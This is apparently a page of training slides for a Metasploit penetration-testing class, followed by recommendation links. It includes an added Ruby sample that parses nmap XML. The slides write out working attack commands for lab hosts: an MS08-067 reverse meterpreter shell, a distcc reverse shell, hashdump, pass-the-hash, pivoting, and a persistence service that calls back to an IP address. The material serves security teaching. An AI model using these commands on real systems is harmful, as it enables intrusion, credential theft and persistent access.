Penetration Testing with Metasploit

Georgia Weidman
Acknowledgements
•   Metasploit Team
•   Offensive Security/Metasploit Unleashed
•   Hackers for Charity
•   David Kennedy
•   BSides Delaware Crew
•   Darren
Agenda
• Metasploit Basics
  – Some terminology/brief intro to pentesting
  – How Metasploit works
  – Interacting with Metasploit
• Basic Exploitation
  – Exploiting a vulnerability using Metasploit console
• Using Meterpreter
  – Using the Meterpreter shell for post exploitation
Agenda
• Metasploit in a penetration test
  – Information Gathering
  – Vulnerability Scanning
  – Exploitation in depth
  – Post exploitation
  – Reporting
• Hack some stuff
  – Pop my boxes
Connecting
Wireless access point SSID IgnatiusRiley
Password: metasploit
What’s in the lab?
• Windows XP SP2
  – IP address: 192.168.20.22


• Ubuntu Linux 8.04 (Metasploitable)
  – IP address: 192.168.20.23



Other lab machines use addresses below .100 (.100 and above are assigned to you, the students)
What is Penetration Testing?

Simulation of a real attack
Get out of jail free card for exploiting systems
Report to customers with findings and recommendations
Find and remediate vulnerabilities before attackers exploit them
What is Metasploit?
Exploitation framework
Ruby based
Modular
Exploits, payloads, auxiliaries, and more
Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to do
Encoders: encode or mangle the payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
Metasploit Interfaces
Msfconsole
Msfcli
Msfweb, Msfgui (discontinued)
Metasploit Pro, Metasploit Express
Armitage
Exploitation Streamlining
• Traditional Pentest:
  – Find public exploit
  – Change offsets and return address for your target
  – Replace shellcode
• Metasploit:
  – Load Metasploit module
  – Select target OS
  – Set IP addresses
  – Select payload
Using Msfconsole: Exploitation

use <module> - sets the exploit/auxiliary/etc. module to use
set <x X> - sets parameter x to X
setg <x X> - sets parameter x to X globally
show <x> - lists all available x (payloads, options, targets, ...)
exploit - runs the selected module
Windows Exploitation Example

search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set rhost 192.168.20.22 (the XP target; set lhost to your own IP and any other required options as well)
exploit
MSFcli Exploitation Example
./msfcli <exploit> <option=x> E
Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E
E = exploit
O = show options
P = show payloads
Linux Exploitation Example
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (your IP)
exploit
Sessions
sessions -l - lists all active sessions
sessions -i <id> - interact with a given session
Meterpreter
Gain a session using a meterpreter payload

Memory based: runs inside the exploited process and never hits the disk

Everything a shell can do plus extra
Meterpreter Commands
help - shows all available commands
background - backgrounds the session
ps - shows all processes
migrate <process id> - moves meterpreter to another process
getuid - shows the user
Meterpreter Commands
download <file> - pulls a file from the victim
upload <file on attacker> <file on victim> - pushes a file to the victim
hashdump - dumps the password hashes from the SAM
shell - drops you into a shell
Exercise

In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.
Experiment with different payloads and meterpreter commands.
Information Gathering
Learning as much about a target as possible

Examples: open ports, running services, installed software

Identify points for further exploration
Metasploit and Databases
Metasploit supports MySQL and PostgreSQL
/etc/init.d/postgresql-8.4 start (starts PostgreSQL)
msf > db_connect postgres:password@127.0.0.1/metasploit (connects to the database server and creates the database metasploit)
Portscanning
Queries a host to see if a program is listening on a port
Ex: browsing to a website - the webserver listens on port 80
Listening ports are accessible to an attacker and, if vulnerable, may be used for exploitation
Ex: ms08_067_netapi exploits SMB on port 445
Metasploit and nmap
Port scanning and just about everything else
http://nmap.org/ and man nmap
Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan of hosts 192.168.20.20 through 192.168.20.99, outputs all formats to files beginning with subnet1)
msf > db_import subnet1.xml
MSF Auxiliary Portscanners
msf > search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP syn scan)
Use auxiliary modules like exploits (use, set, exploit, etc.)
Some Other MSF Scanners
scanner/smb/smb_version (scans port 445 for the SMB version, a good way to get the OS version)
scanner/ssh/ssh_version (queries the SSH version)
scanner/ftp/anonymous (tests for anonymous FTP login)
Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: the SMB version scan in information gathering returned port 445 open and the target as Windows XP SP2, so scan for the ms08_067_netapi vulnerability
Metasploit and Nessus
Tenable's vulnerability scanner (http://www.nessus.org)
msf > load nessus
msf > nessus_connect student1:password@192.168.20.103 ok (ok says no SSL is ok)
msf > nessus_policy_list
msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
msf > nessus_report_list
msf > nessus_report_get <report id>
Metasploit Vulnerability Scanners
SMB Login
  Given a set of credentials, what systems can they access?
  scanner/smb/smb_login
Open VNC and X11
  If misconfigured, may be accessible without credentials
  scanner/vnc/vnc_none_auth
  scanner/x11/open_x11
Using Msfconsole: Exploitation

use <module> - sets the exploit/auxiliary/etc. module to use
set <x X> - sets parameter x to X
setg <x X> - sets parameter x to X globally
show <x> - lists all available x (payloads, options, targets, ...)
exploit - runs the selected module
Our Database
hosts - lists the hosts table
services - lists the services table
vulns - lists the vulns table
-c select columns
-s search for a specific string
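An added example (not from the slides or the Metasploit project) of what db_import and the hosts/services commands above do with an nmap -oA result: it parses a constructed nmap XML document for the two lab hosts into host and service records, supports column selection and string search like -c and -s, and picks out the listening ports an attacker can reach. It uses only Ruby's standard REXML parser; the XML content is constructed sample data, not a real scan.

```ruby
require 'rexml/document'

# Constructed sample in nmap's -oX/-oA XML layout (not real scan output),
# standing in for the subnet1.xml the slides import with db_import.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV 192.168.20.20-99 -oA subnet1">
    <host>
      <status state="up"/>
      <address addr="192.168.20.22" addrtype="ipv4"/>
      <hostnames><hostname name="xp-lab"/></hostnames>
      <ports>
        <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
        <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
        <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
      </ports>
      <os><osmatch name="Microsoft Windows XP SP2"/></os>
    </host>
    <host>
      <status state="up"/>
      <address addr="192.168.20.23" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
        <port protocol="tcp" portid="3632"><state state="open"/><service name="distccd" product="distccd" version="v1"/></port>
      </ports>
    </host>
  </nmaprun>
XML

# Records shaped like the columns of Metasploit's hosts and services tables.
Host    = Struct.new(:address, :name, :os_name, :state)
Service = Struct.new(:host, :port, :proto, :state, :name, :info)

# Attribute of the first element matching xpath under parent, or nil
# (hostnames and os blocks are optional in nmap output).
def attr_of(parent, xpath, name)
  el = parent.elements[xpath]
  el ? el.attributes[name] : nil
end

# Parse nmap XML into host and service records, the way db_import populates the database.
def import_nmap(xml)
  doc = REXML::Document.new(xml)
  hosts = []
  services = []
  doc.elements.each('nmaprun/host') do |h|
    addr = attr_of(h, 'address[@addrtype="ipv4"]', 'addr')
    hosts << Host.new(addr,
                      attr_of(h, 'hostnames/hostname', 'name') || '',
                      attr_of(h, 'os/osmatch', 'name') || '',
                      attr_of(h, 'status', 'state'))
    h.elements.each('ports/port') do |p|
      info = [attr_of(p, 'service', 'product'), attr_of(p, 'service', 'version')].compact.join(' ')
      services << Service.new(addr, p.attributes['portid'].to_i, p.attributes['protocol'],
                              attr_of(p, 'state', 'state'), attr_of(p, 'service', 'name') || '', info)
    end
  end
  [hosts, services]
end

# Equivalent of "hosts -c ... -s ..." / "services -c ... -s ...": keep rows whose
# values contain the search string (case-insensitive), then project onto the requested columns.
def query(rows, columns: nil, search: nil)
  cols = columns || (rows.empty? ? [] : rows.first.members)
  rows.select { |r| search.nil? || r.to_a.any? { |v| v.to_s.downcase.include?(search.downcase) } }
      .map { |r| cols.map { |c| [c, r[c]] }.to_h }
end

# Only listening (open) ports are reachable by an attacker; closed ones are noise.
def open_services(services)
  services.select { |s| s.state == 'open' }
end

# Hosts exposing a given TCP port, e.g. 445 for the SMB service the slides discuss.
def hosts_with_open_port(services, port)
  open_services(services).select { |s| s.port == port && s.proto == 'tcp' }.map(&:host).uniq
end

if __FILE__ == $0
  hosts, services = import_nmap(SAMPLE_NMAP_XML)
  puts "hosts: #{query(hosts, columns: [:address, :os_name]).inspect}"
  puts "smb:   #{query(services, columns: [:host, :port, :name], search: 'microsoft-ds').inspect}"
  puts "445 open on: #{hosts_with_open_port(services, 445).join(', ')}"
end
```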
db_autopwn
By default just runs all the exploits that match a given open port
Not stealthy
Using vulnerability data it can be made smarter: matches vulnerabilities instead of ports
db_autopwn -x -e
Attacking MSSQL
The MSSQL TCP port can change, the UDP port is 1434
msf > search mssql (shows all mssql modules)
msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information including the TCP port)
msf > use scanner/mssql/mssql_login (tries passwords to log into mssql)
msf > use windows/mssql/mssql_payload (logs into mssql and gets a shell)
We have a shell, now what?
Privilege escalation
Local information gathering
Exploiting additional hosts
Maintaining access
Forensic avoidance
Meterpreter: Privilege Escalation
A session has the privileges of the exploited process
getuid (tells you what user your session is running as)
getsystem (tries various techniques to escalate privileges)
Meterpreter: Enabling Remote Desktop
Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group
run getgui -e
Meterpreter: Migrating
If the process that hosts meterpreter closes, meterpreter dies too
Example: a client side exploit residing in the browser
meterpreter > ps (shows all processes)
meterpreter > migrate <process id> (moves to a new process)
Meterpreter: Searching for Content
Look for specific interesting files on the exploited system
search -h
Example: search -f *.jpg (finds all the porn)
Pivoting
Scenario: exploit a dual homed host with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?
route add 10.0.0.0/24 1 (routes traffic to that subnet through session 1)
Now you can portscan, exploit, etc. the non-routable subnet
PSExec
hashdump (dumps the hashes, which are not always easy to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
Meterpreter: Persistence
The persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
  Ex: run persistence -U -i 5 -p 443 -r 192.168.20.101 (respawns on login, retrying at a 5 second interval, connecting back to port 443 on IP 192.168.20.101)
Exercises
Perform a penetration test on the Windows and Linux systems we used in class

Perform a penetration test on the lab network
Contact
Georgia Weidman

Website: http://www.grmn00bs.com
http://www.georgiaweidman.com
Email: georgia@grmn00bs.com
Twitter: @vincentkadmon

Más contenido relacionado

La actualidad más candente

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploitAashish R
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides Amit Dubey
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to MetasploitGTU
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Murat KARA
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Murat KARA
 
Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11Murat KARA
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Murat KARA
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to MetasploitHossein Yavari
 

La actualidad más candente (20)

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Port scanning
Port scanningPort scanning
Port scanning
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9
 
Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 

Destacado

Metasploit
MetasploitMetasploit
Metasploitninguna
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission ModelGeorgia Weidman
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Why Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by DenodoWhy Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by DenodoJusto Hidalgo
 
Big Data Analytics with Hadoop
Big Data Analytics with HadoopBig Data Analytics with Hadoop
Big Data Analytics with HadoopPhilippe Julio
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm
 
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2thePlatform
 
Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Wuzna Haroon
 
Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Patrick Nicholson
 

Destacado (18)

Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission Model
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Why Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by DenodoWhy Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by Denodo
 
Big Data Analytics with Hadoop
Big Data Analytics with HadoopBig Data Analytics with Hadoop
Big Data Analytics with Hadoop
 
Big data ppt
Big  data pptBig  data ppt
Big data ppt
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
 
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
 
"15 Business Story Ideas to Jump on Now"
"15 Business Story Ideas to Jump on Now""15 Business Story Ideas to Jump on Now"
"15 Business Story Ideas to Jump on Now"
 
Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution
 
Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016
 
cathy resume
cathy resumecathy resume
cathy resume
 
Basics of Coding in Pediatrics Medical Billing
Basics of Coding in Pediatrics Medical BillingBasics of Coding in Pediatrics Medical Billing
Basics of Coding in Pediatrics Medical Billing
 

Similar a Metasploit for Penetration Testing: Beginner Class

Similar a Metasploit for Penetration Testing: Beginner Class (20)

Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Hacking 101
Hacking 101Hacking 101
Hacking 101
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Server hardening
Server hardeningServer hardening
Server hardening
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewall
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Wissbi osdc pdf
Wissbi osdc pdfWissbi osdc pdf
Wissbi osdc pdf
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
SSH for pen-testers
SSH for pen-testersSSH for pen-testers
SSH for pen-testers
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Metasploit
MetasploitMetasploit
Metasploit
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 

Último

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 

Último (20)

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 

Metasploit for Penetration Testing: Beginner Class

